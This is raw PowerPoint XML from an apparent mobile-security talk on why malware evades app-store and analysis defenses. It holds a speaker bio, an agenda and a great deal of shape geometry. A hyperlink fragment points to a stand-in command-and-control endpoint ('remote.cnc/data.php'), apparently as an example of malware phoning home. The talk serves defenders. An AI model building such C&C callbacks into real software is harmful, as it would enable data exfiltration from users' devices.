              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Bold"/>
              <a:cs typeface="Lato Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244855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80" r:id="rId11"/>
    <p:sldLayoutId id="2147483682" r:id="rId12"/>
    <p:sldLayoutId id="2147483683" r:id="rId13"/>
    <p:sldLayoutId id="2147483684" r:id="rId14"/>
    <p:sldLayoutId id="2147483685" r:id="rId15"/>
    <p:sldLayoutId id="2147483697" r:id="rId16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tiff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tiff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mote.cnc/data.php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emote.cnc/data.php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tif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kycure.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:contact@skycure.com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tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://maps.skycure.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.skycure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Why Are Hackers Winning the Mobile Malware Battle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204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370487" y="4324120"/>
            <a:ext cx="1895483" cy="95410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2000" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Yair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Amit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Calibri Light"/>
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>CTO, Co-Founder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Skycure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582748" y="5986114"/>
            <a:ext cx="13970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dirty="0">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>15+ Patents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39499" y="5247450"/>
            <a:ext cx="557457" cy="68985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2846" y="3071840"/>
            <a:ext cx="2122583" cy="51308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2846" y="2293985"/>
            <a:ext cx="1024520" cy="40980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392846" y="3842306"/>
            <a:ext cx="119348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Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>IDF 8200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2846" y="1495671"/>
            <a:ext cx="1919502" cy="487553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Yair-non formal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0146" y="1417638"/>
            <a:ext cx="2102254" cy="279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491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Mobile Security Landscape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evolution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of App </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stores &amp; Mobile Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mobile Malware Analysis Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signature-Based, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ynamic &amp; Static Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why Do They Fail?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So What Can Defenders Do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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768821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Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="157" name="Group 156"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3436851" y="1988311"/>
            <a:ext cx="2397602" cy="2397602"/>
            <a:chOff x="3434492" y="1988311"/>
            <a:chExt cx="2397602" cy="2397602"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158" name="Freeform 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4664584" y="1988311"/>
              <a:ext cx="977676" cy="1167509"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 819 w 6201"/>
                <a:gd name="T1" fmla="*/ 5428 h 7403"/>
                <a:gd name="T2" fmla="*/ 1821 w 6201"/>
                <a:gd name="T3" fmla="*/ 6306 h 7403"/>
                <a:gd name="T4" fmla="*/ 6200 w 6201"/>
                <a:gd name="T5" fmla="*/ 7402 h 7403"/>
                <a:gd name="T6" fmla="*/ 5181 w 6201"/>
                <a:gd name="T7" fmla="*/ 4127 h 7403"/>
                <a:gd name="T8" fmla="*/ 2693 w 6201"/>
                <a:gd name="T9" fmla="*/ 1890 h 7403"/>
                <a:gd name="T10" fmla="*/ 3748 w 6201"/>
                <a:gd name="T11" fmla="*/ 5376 h 7403"/>
                <a:gd name="T12" fmla="*/ 3265 w 6201"/>
                <a:gd name="T13" fmla="*/ 4998 h 7403"/>
                <a:gd name="T14" fmla="*/ 3853 w 6201"/>
                <a:gd name="T15" fmla="*/ 5066 h 7403"/>
                <a:gd name="T16" fmla="*/ 3832 w 6201"/>
                <a:gd name="T17" fmla="*/ 5324 h 7403"/>
                <a:gd name="T18" fmla="*/ 2567 w 6201"/>
                <a:gd name="T19" fmla="*/ 4242 h 7403"/>
                <a:gd name="T20" fmla="*/ 3260 w 6201"/>
                <a:gd name="T21" fmla="*/ 4840 h 7403"/>
                <a:gd name="T22" fmla="*/ 2687 w 6201"/>
                <a:gd name="T23" fmla="*/ 5287 h 7403"/>
                <a:gd name="T24" fmla="*/ 2430 w 6201"/>
                <a:gd name="T25" fmla="*/ 5161 h 7403"/>
                <a:gd name="T26" fmla="*/ 2052 w 6201"/>
                <a:gd name="T27" fmla="*/ 4872 h 7403"/>
                <a:gd name="T28" fmla="*/ 3202 w 6201"/>
                <a:gd name="T29" fmla="*/ 3764 h 7403"/>
                <a:gd name="T30" fmla="*/ 3779 w 6201"/>
                <a:gd name="T31" fmla="*/ 4956 h 7403"/>
                <a:gd name="T32" fmla="*/ 3328 w 6201"/>
                <a:gd name="T33" fmla="*/ 4237 h 7403"/>
                <a:gd name="T34" fmla="*/ 3638 w 6201"/>
                <a:gd name="T35" fmla="*/ 4163 h 7403"/>
                <a:gd name="T36" fmla="*/ 3816 w 6201"/>
                <a:gd name="T37" fmla="*/ 4835 h 7403"/>
                <a:gd name="T38" fmla="*/ 2976 w 6201"/>
                <a:gd name="T39" fmla="*/ 4137 h 7403"/>
                <a:gd name="T40" fmla="*/ 3281 w 6201"/>
                <a:gd name="T41" fmla="*/ 4315 h 7403"/>
                <a:gd name="T42" fmla="*/ 2750 w 6201"/>
                <a:gd name="T43" fmla="*/ 4310 h 7403"/>
                <a:gd name="T44" fmla="*/ 2992 w 6201"/>
                <a:gd name="T45" fmla="*/ 3985 h 7403"/>
                <a:gd name="T46" fmla="*/ 2625 w 6201"/>
                <a:gd name="T47" fmla="*/ 4111 h 7403"/>
                <a:gd name="T48" fmla="*/ 3160 w 6201"/>
                <a:gd name="T49" fmla="*/ 3785 h 7403"/>
                <a:gd name="T50" fmla="*/ 3958 w 6201"/>
                <a:gd name="T51" fmla="*/ 5334 h 7403"/>
                <a:gd name="T52" fmla="*/ 4032 w 6201"/>
                <a:gd name="T53" fmla="*/ 5056 h 7403"/>
                <a:gd name="T54" fmla="*/ 4121 w 6201"/>
                <a:gd name="T55" fmla="*/ 4919 h 7403"/>
                <a:gd name="T56" fmla="*/ 3932 w 6201"/>
                <a:gd name="T57" fmla="*/ 4620 h 7403"/>
                <a:gd name="T58" fmla="*/ 4131 w 6201"/>
                <a:gd name="T59" fmla="*/ 4305 h 7403"/>
                <a:gd name="T60" fmla="*/ 3611 w 6201"/>
                <a:gd name="T61" fmla="*/ 3885 h 7403"/>
                <a:gd name="T62" fmla="*/ 3433 w 6201"/>
                <a:gd name="T63" fmla="*/ 3627 h 7403"/>
                <a:gd name="T64" fmla="*/ 3559 w 6201"/>
                <a:gd name="T65" fmla="*/ 3276 h 7403"/>
                <a:gd name="T66" fmla="*/ 3334 w 6201"/>
                <a:gd name="T67" fmla="*/ 3549 h 7403"/>
                <a:gd name="T68" fmla="*/ 2629 w 6201"/>
                <a:gd name="T69" fmla="*/ 3082 h 7403"/>
                <a:gd name="T70" fmla="*/ 2856 w 6201"/>
                <a:gd name="T71" fmla="*/ 3244 h 7403"/>
                <a:gd name="T72" fmla="*/ 3123 w 6201"/>
                <a:gd name="T73" fmla="*/ 3597 h 7403"/>
                <a:gd name="T74" fmla="*/ 2897 w 6201"/>
                <a:gd name="T75" fmla="*/ 3859 h 7403"/>
                <a:gd name="T76" fmla="*/ 2399 w 6201"/>
                <a:gd name="T77" fmla="*/ 3607 h 7403"/>
                <a:gd name="T78" fmla="*/ 2367 w 6201"/>
                <a:gd name="T79" fmla="*/ 3617 h 7403"/>
                <a:gd name="T80" fmla="*/ 2052 w 6201"/>
                <a:gd name="T81" fmla="*/ 4090 h 7403"/>
                <a:gd name="T82" fmla="*/ 1952 w 6201"/>
                <a:gd name="T83" fmla="*/ 4127 h 7403"/>
                <a:gd name="T84" fmla="*/ 2556 w 6201"/>
                <a:gd name="T85" fmla="*/ 4148 h 7403"/>
                <a:gd name="T86" fmla="*/ 1958 w 6201"/>
                <a:gd name="T87" fmla="*/ 4862 h 7403"/>
                <a:gd name="T88" fmla="*/ 1480 w 6201"/>
                <a:gd name="T89" fmla="*/ 4499 h 7403"/>
                <a:gd name="T90" fmla="*/ 1858 w 6201"/>
                <a:gd name="T91" fmla="*/ 5040 h 7403"/>
                <a:gd name="T92" fmla="*/ 1984 w 6201"/>
                <a:gd name="T93" fmla="*/ 5140 h 7403"/>
                <a:gd name="T94" fmla="*/ 2399 w 6201"/>
                <a:gd name="T95" fmla="*/ 5329 h 7403"/>
                <a:gd name="T96" fmla="*/ 2887 w 6201"/>
                <a:gd name="T97" fmla="*/ 5413 h 7403"/>
                <a:gd name="T98" fmla="*/ 2719 w 6201"/>
                <a:gd name="T99" fmla="*/ 5670 h 7403"/>
                <a:gd name="T100" fmla="*/ 2776 w 6201"/>
                <a:gd name="T101" fmla="*/ 5759 h 7403"/>
                <a:gd name="T102" fmla="*/ 3044 w 6201"/>
                <a:gd name="T103" fmla="*/ 5439 h 7403"/>
                <a:gd name="T104" fmla="*/ 3895 w 6201"/>
                <a:gd name="T105" fmla="*/ 5413 h 7403"/>
                <a:gd name="T106" fmla="*/ 3317 w 6201"/>
                <a:gd name="T107" fmla="*/ 5791 h 7403"/>
                <a:gd name="T108" fmla="*/ 2488 w 6201"/>
                <a:gd name="T109" fmla="*/ 5806 h 7403"/>
                <a:gd name="T110" fmla="*/ 1721 w 6201"/>
                <a:gd name="T111" fmla="*/ 5245 h 7403"/>
                <a:gd name="T112" fmla="*/ 1480 w 6201"/>
                <a:gd name="T113" fmla="*/ 4499 h 7403"/>
                <a:gd name="T114" fmla="*/ 1669 w 6201"/>
                <a:gd name="T115" fmla="*/ 3759 h 7403"/>
                <a:gd name="T116" fmla="*/ 2446 w 6201"/>
                <a:gd name="T117" fmla="*/ 3129 h 7403"/>
                <a:gd name="T118" fmla="*/ 3317 w 6201"/>
                <a:gd name="T119" fmla="*/ 3129 h 7403"/>
                <a:gd name="T120" fmla="*/ 4126 w 6201"/>
                <a:gd name="T121" fmla="*/ 3817 h 7403"/>
                <a:gd name="T122" fmla="*/ 4278 w 6201"/>
                <a:gd name="T123" fmla="*/ 4468 h 7403"/>
                <a:gd name="T124" fmla="*/ 1611 w 6201"/>
                <a:gd name="T125" fmla="*/ 4032 h 7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201" h="7403">
                  <a:moveTo>
                    <a:pt x="1202" y="1355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1202" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="5224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="5428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="5528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="5581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="5701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="5833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="5906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="5980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="6059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="6137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="6221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="6306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="6394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="6489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="6678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="6773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="6877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="7082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="7292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6184" y="7124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6158" y="6851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6121" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6073" y="6316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6016" y="6053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5943" y="5796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5864" y="5544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5775" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5675" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5444" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5318" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5034" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4877" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4714" y="3502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4546" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4367" y="3113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="2935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="2594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="2436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="2289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="2147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693" y="1890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2456" y="1774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="1670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="1575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716" y="1491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202" y="1355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="598" y="903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598" y="903"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3832" y="5355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3570" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217" y="5129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3265" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3364" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="4967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="5082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3937" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2052" y="4872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="4767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268" y="4494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2336" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845" y="4515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3003" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="4725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3228" y="4977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="5045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="5108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="5177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2562" y="5213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2525" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="4961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3459" y="3817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
